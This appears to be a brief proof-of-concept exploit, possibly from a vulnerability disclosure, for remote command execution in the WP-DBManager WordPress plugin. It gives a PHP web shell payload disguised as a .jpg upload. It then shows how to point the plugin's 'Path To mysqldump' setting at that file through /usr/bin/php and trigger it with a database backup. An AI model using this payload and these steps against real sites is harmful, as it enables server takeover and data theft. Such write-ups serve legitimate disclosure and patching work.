# Use any WordPress plugin that allows the users to upload files with extension - ".php" is not required -  for example: .jpg (usually many plugins allows such extensions)
# Upload your malicious file, for example: test_rce.jpg with the following content:

<?php system("COMMAND"); ?>

# Go to "DB Options" under WP-DBManager plugin
# Define the below payload as "Path To mysqldump" parameter's value:

/usr/bin/php /var/www/blog/test_rce.jpg

# Go to "Backup DB" and click on "Backup" button
# Command will get executed without any issues